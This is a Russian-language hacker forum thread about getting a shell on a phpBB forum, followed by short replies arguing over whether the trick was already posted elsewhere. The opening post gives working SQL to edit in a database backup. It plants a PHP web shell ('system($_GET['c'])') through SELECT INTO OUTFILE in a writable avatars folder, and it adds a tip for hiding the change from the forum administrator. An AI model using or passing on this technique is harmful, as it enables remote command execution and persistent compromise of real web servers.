Шелл через пхпББ

[aivus]

ХАЙ!
Если у вас есть админ-доступ к форуму пхпББ вы можите получить простенький шелл, а с него уже загрузить полнофункциональный....
1. Заходим в админку и делаем бекап.
2. Открываем скачаный нами файл и ищем строки:

INSERT INTO phpbb_categories (cat_id, cat_title, cat_order)

3. Изменяем их на следующее:

DELETE FROM phpbb_categories where  cat_id = 1 LIMIT 1;
INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', ' <? system($_GET["c"]); ?>', '10');
SELECT cat_title INTO OUTFILE 'path' from phpbb_categories where cat_title=' <? system($_GET["c"]); ?>';
UPDATE phpbb_categories SET cat_title='test' WHERE cat_id=1;

a) Где "path" полный путь с корневого каталога(например c:\www\htdocs\localhost\forum\images\avatars\shell.php) вписуем путь только на папку с правами на запись-чтение.
B) Где "test" имя категории №1 которое было до нашего вмешательства(можно конечно не менять, но админ может заметить).
3. Сохраняем базу и восстанавливаем. Всё заходим на localhost\forum\images\avatars\shell.php?c=dir
и всё у нас есть шелл. :yahoo:

 

[not null]

[::|\/\/\/\/\/|::]
Видео про использование этой фичи уже давно пылиться на ачате

 

[aivus]

Знаю, но там не всё можно разглядеть... Например я сам дописываю половину кода так-как там видно только начало... так что это мне кажется более подробно...

 

[0v3rman]

Там всё это и так было описано

 

[aivus]

0v3rman
Я смотрел то видео и еще раз повторяю :fool: :angry:

там не всё можно разглядеть... Например я сам дописываю половину кода так-как там видно только начало.

Это пустые разговоры, кому нужно тот прочитает и сохранит....

 

[Nax[no]rt]

Кстати как раз я об этом и писала на ачате.
А так пусть будет ) для повторения сгодиться ))